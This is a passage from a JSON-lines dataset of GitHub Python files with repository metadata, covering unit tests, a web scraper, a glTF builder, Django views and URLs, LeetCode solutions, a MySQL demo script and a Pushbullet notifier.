test_requestid(self):\n \"\"\"\n :description: Getting the version to check requestId\n :resources: '/version'\n \"\"\"\n requestId = str(int(datetime.timestamp(datetime.now()))) + ',' + str(uuid4())\n reply = self.FacesApi.getVersion(lunaRequestId=requestId)\n self.assertEqual(requestId, reply.headers['Luna-Request-Id'])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-faces/tests/unittests_request_id.py","file_name":"unittests_request_id.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15525311613","text":"\"\"\"\nGet the list of Codewars Leaderboard score (aka Honor) in descending order\n\nNote:\nif it was the bad timing, the data could be updated during your test cases.\nTry several times if you had such experience.\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport http.client\nURL = 'https://www.codewars.com/users/leaderboard'\n\ndef connect():\n page = urllib.request.urlopen(URL)\n data = http.client.HTTPResponse.read(page)\n soup = BeautifulSoup(data, 'html.parser')\n return soup.body\n\ndef get_leaderboard_honor():\n body = connect()\n table_rows = body.find('div', attrs={'class':'leaderboard pan'}).find('table').find_all(\"tr\")\n honor_list = []\n for i in range(1, len(table_rows)):\n curr_row = table_rows[i]\n row_data = curr_row.find_all('td')\n honor = (int)(row_data[3].get_text())\n honor_list.append(honor)\n return honor_list \n \n","repo_name":"Manish-Giri/Codewars","sub_path":"Python/codewars-leaderboard.py","file_name":"codewars-leaderboard.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"40573757779","text":"import enum\n\n# https://github.com/KhronosGroup/glTF/tree/master/specification/1.0\n\n# Uniform Semantics:\n# LOCAL, MODEL, VIEW, PROJECTION, ...\n\nclass Uniform(enum.Enum):\n LOCAL = \"LOCAL\"\n MODEL = \"MODEL\"\n VIEW = \"VIEW\"\n PROJECTION = \"PROJECTION\"\n\n# Attribute Semantics:\n# POSITION, NORMAL, TEXCOORD_0, TEXCOORD_1, COLOR, JOINT, WEIGHT\n\nclass Attribute(enum.Enum):\n POSITION = \"POSITION\"\n NORMAL = \"NORMAL\"\n TEXCOORD = \"TEXCOORD\"\n TEXCOORD_0 = \"TEXCOORD_0\"\n TEXCOORD_1 = \"TEXCOORD_1\"\n COLOR = \"COLOR\"\n JOINT = \"JOINT\"\n WEIGHT = \"WEIGHT\"\n\n# Accessor Types:\n# SCALAR, VEC2, VEC3, VEC4, MAT2, MAT3, MAT4\n\nclass AccessorType(enum.Enum):\n SCALAR = \"SCALAR\"\n VEC2 = \"VEC2\"\n VEC3 = \"VEC3\"\n VEC4 = \"VEC4\"\n MAT2 = \"MAT2\"\n MAT3 = \"MAT3\"\n MAT4 = \"MAT4\"\n\n# Component Types:\n# SCALAR, VEC2, VEC3, VEC4, MAT2, MAT3, MAT4\n\nclass ComponentType(enum.Enum):\n BYTE = 5120\n UNSIGNED_BYTE = 5121\n SHORT = 5122\n UNSIGNED_SHORT = 5123\n FLOAT = 5126\n\nclass BufferTarget(enum.Enum):\n ARRAY_BUFFER = 34962\n ELEMENT_ARRAY_BUFFER = 34963\n\nclass PrimitiveMode(enum.Enum):\n POINTS = 0\n LINES = 1\n LINE_LOOP = 2\n LINE_STRIP = 3\n TRIANGLES = 4\n TRIANGLE_STRIP = 5\n TRIANGLE_FAN = 6\n\ndef askey(name):\n return name.replace(\" \", \"_\").lower()\n\n\nclass Document(object):\n @classmethod\n def from_mesh(cls, mesh, material=None):\n node = Node(\"Default Node\", meshes=[mesh])\n scene = Scene(\"Default Scene\", nodes=[node])\n \n materials = {} if material is None else {material.key: material}\n meshes = {} if mesh is None else {mesh.key: mesh}\n nodes = {node.key: node}\n scenes = {scene.key: scene}\n \n return cls(materials=materials, meshes=meshes, nodes=nodes, scenes=scenes, scene=scene)\n \n @classmethod\n def from_meshes(cls, meshes, materials=None):\n meshes = [] if meshes is None else meshes\n materials = [] if materials is None else materials\n \n node = Node(\"Default Node\", meshes=meshes)\n scene = Scene(\"Default Scene\", nodes=[node])\n \n materials = {material.key: material for material in materials}\n meshes = {mesh.key: mesh for mesh in meshes}\n nodes = {node.key: node}\n scenes = {scene.key: scene}\n \n return cls(materials=materials, meshes=meshes, nodes=nodes, scenes=scenes, scene=scene)\n \n def __init__(self, *args, **kwargs):\n self.asset = {\"version\": \"1.0\"}\n self.scene = kwargs.get('scene', None)\n self.scenes = kwargs.get('scenes', {})\n self.nodes = kwargs.get('nodes', {})\n self.meshes = kwargs.get('meshes', {})\n self.materials = kwargs.get('materials', {})\n self.accessors = kwargs.get('accessors', {})\n self.buffer_views = kwargs.get('buffer_views', {})\n self.buffers = kwargs.get('buffers', {})\n \n def add_scene(self, value):\n self.scenes[value.key] = value\n def add_node(self, value):\n self.nodes[value.key] = value\n def add_mesh(self, value):\n self.meshes[value.key] = value\n def add_material(self, value):\n self.materials[value.key] = value\n def add_accessor(self, value):\n self.accessors[value.key] = value\n def add_buffer_view(self, value):\n self.buffer_views[value.key] = value\n def add_buffer(self, value):\n self.buffers[value.key] = value\n \n def togltf(self):\n return {\n \"buffers\": {key: buffer.togltf() for key, buffer in self.buffers.items()},\n \"bufferViews\": {key: buffer_view.togltf() for key, buffer_view in self.buffer_views.items()},\n \"accessors\": {key: accessor.togltf() for key, accessor in self.accessors.items()},\n \"materials\": {key: material.togltf() for key, material in self.materials.items()},\n \"meshes\": {key: mesh.togltf() for key, mesh in self.meshes.items()},\n \"nodes\": {key: node.togltf() for key, node in self.nodes.items()},\n \"scenes\": {key: scene.togltf() for key, scene in self.scenes.items()},\n \"scene\": self.scene.key,\n \"asset\": self.asset,\n }\n\nclass Scene(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, *args, **kwargs):\n self.name = name\n self.nodes = kwargs.get('nodes', [])\n def togltf(self):\n return {\n \"name\": self.name,\n \"nodes\": [node.key for node in self.nodes],\n }\n\nclass Node(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, *args, **kwargs):\n self.name = name\n self.matrix = [\n 1, 0, 0, 0,\n 0, 1, 0, 0,\n 0, 0, 1, 0,\n 0, 0, 0, 1\n ],\n self.meshes = kwargs.get('meshes', [])\n self.children = kwargs.get('children', [])\n def togltf(self):\n return {\n \"name\": self.name,\n \"matrix\": self.matrix,\n \"meshes\": [mesh.key for mesh in self.meshes],\n \"children\": [child.key for child in self.children],\n }\n\nclass Accessor(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, bufferView, byteOffset = 0, byteStride = 0, count = 0, type = AccessorType.SCALAR, componentType = ComponentType.FLOAT):\n self.name = name\n self.type = type\n self.componentType = componentType\n self.bufferView = bufferView\n self.byteOffset = byteOffset\n self.byteStride = byteStride\n self.count = count\n self.max = None\n self.min = None\n def togltf(self):\n return {\n #\"name\": self.name,\n \"bufferView\": self.bufferView.key,\n \"byteOffset\": self.byteOffset,\n \"byteStride\": self.byteStride,\n \"componentType\": self.componentType.value,\n \"count\": self.count,\n \"type\": self.type.value,\n #\"max\": self.max,\n #\"min\": self.min,\n }\n\nclass BufferView(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, buffer, byteOffset=0, byteLength=0, target=BufferTarget.ARRAY_BUFFER):\n self.name = name\n self.buffer = buffer\n self.byteOffset = byteOffset\n self.byteLength = byteLength\n self.target = target\n def togltf(self):\n return {\n #\"name\": self.name,\n \"buffer\": self.buffer.key,\n \"byteOffset\": self.byteOffset,\n \"byteLength\": self.byteLength,\n \"target\": self.target.value,\n }\n\nclass Buffer(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, uri, byteLength=0, type=\"arraybuffer\"):\n self.name = name\n self.uri = uri\n self.byteLength = byteLength\n self.type = type\n def togltf(self):\n return {\n #\"name\": self.name,\n \"uri\": self.uri,\n \"byteLength\": self.byteLength,\n \"type\": self.type,\n }\n\nclass Primitive(object):\n def __init__(self, attributes, indices, material, mode=PrimitiveMode.TRIANGLES, targets=None):\n self.attributes = attributes\n self.indices = indices\n self.material = material\n self.mode = mode\n self.targets = targets\n def togltf(self):\n result = {\n \"attributes\": {key.value: attribute.key for key, attribute in self.attributes.items()},\n }\n if self.indices:\n result[\"indices\"] = self.indices.key\n if self.material:\n result[\"material\"] = self.material.key\n if self.mode:\n result[\"mode\"] = self.mode.value\n #if self.targets:\n # result[\"targets\"] = self.targets\n return result\n\nclass Mesh(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, primitives = None):\n self.name = name\n self.primitives = [] if primitives is None else primitives \n def togltf(self):\n return {\n \"name\": self.name,\n \"primitives\": [primitive.togltf() for primitive in self.primitives]\n }\n\nclass Material(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name):\n self.name = name\n self.values = {\n \"ambient\": [0.0, 0.0, 0.0, 1],\n \"diffuse\": [0.0, 0.0, 0.0, 1],\n \"specular\": [0.0, 0.0, 0.0, 1],\n \"emission\": [0.0, 0.0, 0.0, 1],\n \"shininess\": 256\n }\n def __setitem__(self, key, item):\n self.values[key] = item\n def __getitem__(self, key):\n return self.values[key]\n def togltf(self):\n return {\n \"name\": self.name,\n \"values\": self.values,\n }","repo_name":"filonik/pygltf","sub_path":"pygltf/gltf1.py","file_name":"gltf1.py","file_ext":"py","file_size_in_byte":9128,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"69837946347","text":"from keras.models import load_model\nfrom tkinter.filedialog import askopenfilename, askdirectory\nfrom keras.preprocessing.image import ImageDataGenerator\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\n\ndef __get_image_generator():\n test_datagen = ImageDataGenerator()\n test_set = test_datagen.flow_from_directory('images/test',\n batch_size=50,\n target_size=(200,200))\n \n return test_set\n\nmodel_path = askopenfilename()\nmodel = load_model(model_path)\ngenerator = __get_image_generator()\n\ncount = 0\nacc = []\nfor i in range(30):\n loss, a = model.evaluate_generator(generator, steps=25)\n acc.append(a)\n count += 1\n print(count)\n\ndf = pd.DataFrame({'val_acc': acc})\ndf.to_csv('val_acc_best.csv')","repo_name":"augustsemrau/02461-IntelligentSystems_ExamProject_CNN_January2019","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71268884267","text":"\nclass Solution:\n def deleteNode(self, node):\n \"\"\"\n :type node: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n temp = node.next\n node.val = temp.val\n node.next = temp.next\n","repo_name":"BeamlakTesfahun/Competitive-Programming","sub_path":"Delete_Node_in_Linked_List.py","file_name":"Delete_Node_in_Linked_List.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42256398601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefinition of urls for DjangoWebProject.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\nimport DjangoWebProject.settings\nfrom django.contrib import auth\nimport app\nfrom app.views import *\nfrom app.project import *\nfrom app.project import *\n\n# Uncomment the next lines to enable the admin:\nfrom django.conf.urls import include\nfrom django.contrib import admin\nfrom DjangoWebProject import settings\nadmin.autodiscover()\n\nurlpatterns = [\n #url(r'/(?P.*)','django.views.static.serve',{'document_root':settings.STATIC_ROOT+'/images'}), \n url(r'^$', home, name='home'),\n url(r'^contact$', contact, name='contact'),\n url(r'^about', about, name='about'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login2.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n },\n name='login'),\n url(r'^logout$',django.contrib.auth.views.logout,{'next_page': '/',},name='logout'),\n url(r'^register/$',register),\n url(r'^search_form/$',search_form),\n url(r'^search/$',search),\n url(r'^reset',reset),\n url(r'^changepassword/(?P\\w+)/$',changepassword), \n\n url(r'^student/papers$',papers),\n\n\n\n url(r'^test',test),\n\n url(r'^complete/$',ShowComplete,name='complete'),\n url(r'^complete/(?P\\w+)$',ShowComplete,name='complete'),\n url(r'^studentIndex/(?P\\w+)$',ProjectIndex),\n url(r'^first/$',first),\n url(r'^copy/$',shit),\n\n url(r'^add/(?P\\w+)/(?P\\w+)$',LinkAdd),\n url(r'^add/(?P\\w+)/(?P\\w+)/(?P\\w+)$',LinkAdd),\n url(r'^create/(?P\\w+)$',ProjectCreate,name = 'create'),\n url(r'^Index/$',ProjectIndex,name = 'project'),\n url(r'^Index/(?P\\w+)$',ProjectIndex),\n url(r'^check/(?P\\w+)$',ProjectCheck),\n url(r'^check/(?P\\w+)/(?P\\w+)$',ProjectCheck),\n url(r'^Check/(?P\\w+)$',ProjectCheck),\n url(r'^Check/(?P\\w+)/(?P\\w+)$',ProjectCheck),\n url(r'^delete/(?P\\w+)$',ProjectDelete),\n url(r'^detail/(?P\\w+)$',ProjectDetail),\n url(r'^Detail/(?P\\w+)$',ProjectDetail),\n url(r'^Add/(?P\\w+)/(?P\\w+)$',ProjectAdd),\n\n url(r'^construction/$',construction,name='construction'), \n url(r'^excel/$',Excel),\n #C:\\Users\\Administrator\\Source\\Repos\\SITE-database\\DjangoWebProject\\DjangoWebProject\\app\\static\\images\n \n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^i18n/', include('django.conf.urls.i18n')),\n]\n","repo_name":"kaleid0scope/SITE-database","sub_path":"DjangoWebProject/DjangoWebProject/DjangoWebProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36652437177","text":"# Medium\n# https://leetcode.com/problems/implement-trie-prefix-tree/\nclass TrieNode:\n def __init__(self, text='', isWord=False):\n self.text = text\n self.children = {}\n self.isWord = isWord\n\nclass Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = TrieNode()\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n curr = self.root\n for letter in word:\n if letter not in curr.children:\n curr.children[letter] = TrieNode(letter)\n curr = curr.children[letter]\n curr.isWord = True\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n curr = self.root\n for letter in word:\n if letter not in curr.children:\n return False\n curr = curr.children[letter]\n return curr.isWord\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n curr = self.root\n for letter in prefix:\n if letter not in curr.children:\n return False\n curr = curr.children[letter]\n \n if curr.children or curr.isWord:\n return True \n return False\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)","repo_name":"EnigmaCodex-ACE/StudentCodeSnippets","sub_path":"Leetcode-Solutions/Strings/208. Implement Prefix Trie.py","file_name":"208. Implement Prefix Trie.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9160349343","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#author:Alicehuang\n\nimport pymysql\n#打开数据库\ndb=pymysql.connect(host='192.168.4.50',port=3306,user='root',password='123456',db='school')\n\n#获取游标对象\ncursor = db.cursor()\n\n#执行sql操作\nsql_select= \"select version()\"\ncursor.execute(sql_select)\n\n#获取版本信息\ndata = cursor.fetchone()\nprint(\"DB version is : %s\" %data)\n\n#如果存在删除\ncursor.execute(\"drop table if exists class\")\n\n#创建表\nsql_create=\"create table class(class_id INT PRIMARY KEY auto_increment,class CHAR(10),FOREIGN KEY(class_id) REFERENCES student(student_id) ON UPDATE CASCADE ON DELETE CASCADE )engine = innodb charset = utf8\"\ncursor.execute(sql_create)\n#插入数据\nsql_insert= '''insert into class(class) values(\"三年级三班\")'''\ntry:\n cursor.execute(sql_insert)\n db.commit()\nexcept:\n db.rollback()\n\n\n#查询表数据\nsql_select= '''select * from class'''\ntry:\n cursor.execute(sql_select)\n #获取所有记录列表\n result = cursor.fetchall()\n for row in result:\n id = row[0]\n name = row[1]\n print (\"id = %d,name=%s\" %(id,name))\nexcept:\n print(\"Error:unable to fetch data\")\n\n\n# try:\n# cursor.execute(sql_insert)\n# db.commit()\n# except:\n# db.rollback()\n\nprint(\"end\")\ndb.commit()\ncursor.close()\ndb.close()\n","repo_name":"Alicebat/-Python","sub_path":"database/data_class.py","file_name":"data_class.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70940654508","text":"import json\n\n\n\"\"\"\n Tic Tac Toe Review\n\n You know lists? Use them :)\n\"\"\"\n\nusers = [\"Joe\", \"Fred\"]\nmarks = [\"X\", \"O\"]\nboard = ['', '', '', '', '', '', '', '', '']\nturns = 0\n\nwhile turns < 9:\n # We can simulate 2 players using modulo math, get an index and then use\n # that with users/marks\n current_index = turns % 2\n\n print(\"Player {} with mark {} it's your turn\".format(\n users[current_index],\n marks[current_index]\n )\n )\n board[turns] = marks[current_index]\n print(board)\n turns += 1\n\nprint(\"Game hit 9 turns\")\n\n#quit()\n\nprint(\"\\nSIMPLE DICTIONARY\\n\")\n\n# Create one\nsimple_dict = {}\n\n# You add to it by simply referencing a location\nsimple_dict[\"name\"] = \"Mr. Grecoe\"\nprint(simple_dict[\"name\"])\n\n# Iterate over the dictionary using keys\nfor key in simple_dict.keys():\n print(\"Key = {}, Value = {}\".format(key, simple_dict[key]))\n\n# Remove using pop or delete\n# Pop allows you to pop a key IF PRESENT or return a default value. If present\n# you get the stored value.\npop_res = simple_dict.pop(\"foo\", None)\nprint(\"POP MISSING KEY RESULT ->\", pop_res)\n\n# Delete the key MUST exist, if it doesn't you will get an exception (unlike pop)\ndel simple_dict[\"name\"]\nprint(\"AFTER DELETE ->\", simple_dict)\n\n#quit()\n\n\n\"\"\"\n Word counter using a dictionary.\n\n key = word, value = count (# of times it's been seen)\n\n String can be broken up using split()\n\"\"\"\n\nprint(\"\\nWORD COUNTER\\n\")\nparagraph = \"\"\"Last season, Nico Hulkenberg made a dramatic return to F1 in place of Sergio Perez and then Lance Stroll, while George Russell stepped in for Lewis Hamilton late on. As a result, Albon is staying sharp in case he's needed this season if Max Verstappen, Yuki Tsunoda, Perez or Pierre Gasly can't race for any reason.\"\"\"\n\ntotal_words = 0\nfound_words = {}\n# Break up \"paragraph\" into seperate words.\nbreak_down = paragraph.split(' ')\nfor word in break_down:\n total_words += 1\n\n # Strip off any periods and make lower case for checking\n cur_word = word.strip('.').lower()\n\n # If it's not in our dict, add it, otherwise increment count.\n if cur_word not in found_words:\n found_words[cur_word] = 1\n else:\n found_words[cur_word] += 1\n\n# Print out some context (how many total, how many unique)\nprint(\"TOTAL WORDS:\", total_words, \"UNIQUE WORDS:\", len(found_words))\nprint(\"ALL FOUND WORDS:\\n\", found_words)\n\n# Go through and just pop each one off\nfor w in list(found_words.keys()):\n found_words.pop(w)\n\n# Now our dictionary is empty\nprint(\"CLEANED DICT LEN:\", len(found_words))\n\nquit()\n\n\n\n\n\n\n\n","repo_name":"grecoe/teals","sub_path":"dictionaryex.py","file_name":"dictionaryex.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17455026216","text":"# Stwórz funkcję nazwaną zbadajTrojkat() która przyjmie jako argumenty długości boków trójkąta.\n# Funkcja powinna zwrócić, czy trójkąt jest prostokątny, równoramienny, równoboczny, różnoboczny lub nieprawidłowy\nimport math\nwhile True:\n\tdef zbadajTrojkat(a, b, c):\n\t\t\tif a + b >= c and b + c >= a and c + a >= b:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\tdef typ_trojkata(a, b, c):\n\t\tif a == b and b == c:\n\t\t\tprint('Trójkąt jest równoboczny.')\n\t\telif a == b or b == c or a == c:\n\t\t\tprint('Trójkąt jest równoramienny.')\n\t\telif c == math.sqrt(a ** 2 + b ** 2) or b == math.sqrt(a ** 2 + c ** 2) or a == math.sqrt(b ** 2 + c ** 2):\n\t\t\tprint('Trójkąt jest prostokątny.')\n\t\telse:\n\t\t\tprint('Trójkąt jest różnoboczny.')\n\n\tbok_a = float(input('Podaj długość boku A: '))\n\tbok_b = float(input('Podaj długość boku B: '))\n\tbok_c = float(input('Podaj długość boku C: '))\n\n\tif zbadajTrojkat(bok_a, bok_b, bok_c):\n\t\ttyp_trojkata(bok_a, bok_b, bok_c)\n\telse:\n\t\tprint('Z bodanych wartości nie można stworzyć trójkąta.')","repo_name":"Mardmoo/ISA-Bootcamp_zadania-domowe","sub_path":"Zjazd_2/praca_domowa_zjazd2_2.py","file_name":"praca_domowa_zjazd2_2.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21702202653","text":"from Elements.Node import Node\nfrom Elements.Connector import *\nfrom vpython import *\n\n\nclass Tensegrity:\n def __init__(self, nodes=None):\n self.nodes = []\n if nodes is not None:\n self.add_nodes(nodes)\n\n\n def add_nodes(self, nodes):\n if type(nodes) is Node and nodes not in self.nodes:\n self.nodes.append(nodes)\n elif type(nodes) is list and all(isinstance(e, Node) for e in nodes):\n [self.add_nodes(n) for n in nodes]\n\n def set_connections(self, connections):\n for i in range(len(self.nodes)):\n for j in range(i, len(connections[i])):\n if connections[i][j] == 1:\n self.nodes[i].add_strut(self.nodes[j])\n elif connections[i][j] == 2:\n self.nodes[i].add_tendon(self.nodes[j])\n\n def build_vpython_tensegrity(self):\n elements = []\n for node in self.nodes:\n for other in node.tendons:\n T = Tendon(node, other)\n if T not in elements:\n elements.append(T)\n for other in node.struts:\n S = Strut(node, other)\n if S not in elements:\n elements.append(S)\n return [_.get_vpython_element() for _ in elements]\n","repo_name":"PatrickPitts/Tensegrity","sub_path":"Elements/Tensegrity.py","file_name":"Tensegrity.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70037467626","text":"from django.shortcuts import render,get_object_or_404, redirect\n\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.models import User\n\nfrom avaliacoes.models import Avaliacao, Criterio\nfrom avaliacoes.forms import AvaliacaoForm\n\nfrom core import views\n\ndef avaliacao_realizada(request):\n\treturn render(request,'avaliacao-realizada.html')\n\n@permission_required('avaliacoes.view_avaliacao', login_url=views.autorizacao_negada)\ndef listar_avaliacoes(request): \n avaliacoes = Avaliacao.objects.all()\n template_name = 'listar-avaliacoes.html'\n context = {\n 'avaliacoes': avaliacoes,\n }\n return render(request, template_name, context)\n\n@permission_required('avaliacoes.add_avaliacao', login_url=views.autorizacao_negada)\ndef minha_avaliacao(request): \n avaliacao = Avaliacao.objects.filter(avaliador=request.user)\n template_name = 'minha-avaliacao.html'\n context = {\n 'avaliacao': avaliacao,\n }\n return render(request, template_name, context)\n\n\n@permission_required('avaliacoes.add_avaliacao', login_url=views.autorizacao_negada)\ndef avaliar_criterio(request):\n\tcontext = {}\n\ttemplate_name = 'avaliar.html'\n\tuser = User.objects.get(id=request.user.id)\n\tverificar_usuario = Avaliacao.objects.filter(avaliador=user)\n\tif verificar_usuario.exists():\n\t\treturn redirect(avaliacao_realizada) #Caso o usuário já exista, significa que uma avaliação já foi realizada.\n\tif request.method == 'POST':\n\t\tform = AvaliacaoForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser = form.save(commit=False)\n\t\t\tuser.avaliador = request.user\n\t\t\tuser.save()\n\t\t\treturn redirect(listar_avaliacoes)\n\telse:\n\t\tform = AvaliacaoForm()\n\tcontext['form'] = form\n\treturn render(request, template_name, context)\n'''\n\ndef avaliar_criterio(request):\n\tcontext = {}\n\ttemplate_name = 'avaliar.html'\n\tif request.user.is_authenticated:\n\t\tuser = User.objects.get(id=request.user.id)\n\t\tif request.method == 'POST':\n\t\t\tform = AvaliacaoForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tuser = form.save(commit=False)\n\t\t\t\tuser.avaliador = request.user\n\t\t\t\tuser.save()\n\t\t\t\treturn redirect(listar_avaliacoes)\n\t\telse:\n\t\t\tform = AvaliacaoForm()\n\telse:\n\t\tif request.method == 'POST':\n\t\t\tform = AvaliacaoForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tuser = form.save()\n\t\t\t\tuser.save()\n\t\t\t\treturn redirect(listar_avaliacoes)\n\t\telse:\n\t\t\tform = AvaliacaoForm()\n\tcontext['form'] = form\n\treturn render(request, template_name, context)\n'''\n\n\n","repo_name":"Glaysonvisgueira/academia","sub_path":"avaliacoes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13089581238","text":"from urllib.parse import urljoin\n\nfrom requests.structures import CaseInsensitiveDict\n\nfrom sickchill import logger, settings\nfrom sickchill.oldbeard import common, helpers\nfrom sickchill.oldbeard.classes import UIError\n\n\nclass Notifier(object):\n def __init__(self):\n self.session = helpers.make_session()\n self.url = \"https://api.pushbullet.com/v2/\"\n\n def test_notify(self, pushbullet_api):\n logger.debug(\"Sending a test Pushbullet notification.\")\n return self._sendPushbullet(pushbullet_api, event=\"Test\", message=\"Testing Pushbullet settings from SickChill\", force=True)\n\n def get_devices(self, pushbullet_api):\n logger.debug(\"Testing Pushbullet authentication and retrieving the device list.\")\n headers = CaseInsensitiveDict({\"Access-Token\": pushbullet_api})\n return helpers.getURL(urljoin(self.url, \"devices\"), session=self.session, headers=headers, returns=\"text\") or {}\n\n def get_channels(self, pushbullet_api):\n \"\"\"Fetches the list of channels a given access key has permissions to push to\"\"\"\n logger.debug(\"Testing Pushbullet authentication and retrieving the device list.\")\n headers = CaseInsensitiveDict({\"Access-Token\": pushbullet_api})\n return helpers.getURL(urljoin(self.url, \"channels\"), session=self.session, headers=headers, returns=\"text\") or {}\n\n def notify_snatch(self, ep_name):\n if settings.PUSHBULLET_NOTIFY_ONSNATCH:\n self._sendPushbullet(pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_SNATCH] + \" : \" + ep_name, message=ep_name)\n\n def notify_download(self, ep_name):\n if settings.PUSHBULLET_NOTIFY_ONDOWNLOAD:\n self._sendPushbullet(pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_DOWNLOAD] + \" : \" + ep_name, message=ep_name)\n\n def notify_subtitle_download(self, ep_name, lang):\n if settings.PUSHBULLET_NOTIFY_ONSUBTITLEDOWNLOAD:\n self._sendPushbullet(\n pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD] + \" : \" + ep_name + \" : \" + lang, message=ep_name + \": \" + lang\n )\n\n def notify_update(self, new_version=\"??\"):\n self._sendPushbullet(\n pushbullet_api=None,\n event=common.notifyStrings[common.NOTIFY_UPDATE],\n message=common.notifyStrings[common.NOTIFY_UPDATE_TEXT] + new_version,\n # link=link\n )\n\n def notify_login(self, ipaddress=\"\"):\n self._sendPushbullet(\n pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_LOGIN], message=common.notifyStrings[common.NOTIFY_LOGIN_TEXT].format(ipaddress)\n )\n\n def notify_logged_error(self, ui_error: UIError):\n self._sendPushbullet(pushbullet_api=None, event=ui_error.title, message=ui_error.message)\n\n def _sendPushbullet(self, pushbullet_api=None, pushbullet_device=None, pushbullet_channel=None, event=None, message=None, link=None, force=False):\n if not (settings.USE_PUSHBULLET or force):\n return False\n\n pushbullet_api = pushbullet_api or settings.PUSHBULLET_API\n pushbullet_device = pushbullet_device or settings.PUSHBULLET_DEVICE\n pushbullet_channel = pushbullet_channel or settings.PUSHBULLET_CHANNEL\n\n logger.debug(\"Pushbullet event: {0!r}\".format(event))\n logger.debug(\"Pushbullet message: {0!r}\".format(message))\n logger.debug(\"Pushbullet api: {0!r}\".format(pushbullet_api))\n logger.debug(\"Pushbullet devices: {0!r}\".format(pushbullet_device))\n\n post_data = {\"title\": event, \"body\": message, \"type\": \"link\" if link else \"note\"}\n if link:\n post_data[\"url\"] = link\n\n headers = CaseInsensitiveDict({\"Access-Token\": pushbullet_api})\n\n if pushbullet_device:\n post_data[\"device_iden\"] = pushbullet_device\n elif pushbullet_channel:\n post_data[\"channel_tag\"] = pushbullet_channel\n\n response = helpers.getURL(urljoin(self.url, \"pushes\"), session=self.session, post_data=post_data, headers=headers, returns=\"json\") or {}\n\n failed = response.pop(\"error\", {})\n if failed:\n logger.warning(\"Pushbullet notification failed: {0}\".format(failed.pop(\"message\")))\n else:\n logger.debug(\"Pushbullet notification sent.\")\n\n return False if failed else True\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/notifiers/pushbullet.py","file_name":"pushbullet.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"26879874304","text":"# Given an input string (s) and a pattern (p), implement regular expression matching with support for '.' and '*'.\n#\n# '.' Matches any single character.\n# '*' Matches zero or more of the preceding element.\n# The matching should cover the entire input string (not partial).\n#\n# Note:\n#\n# s could be empty and contains only lowercase letters a-z.\n# p could be empty and contains only lowercase letters 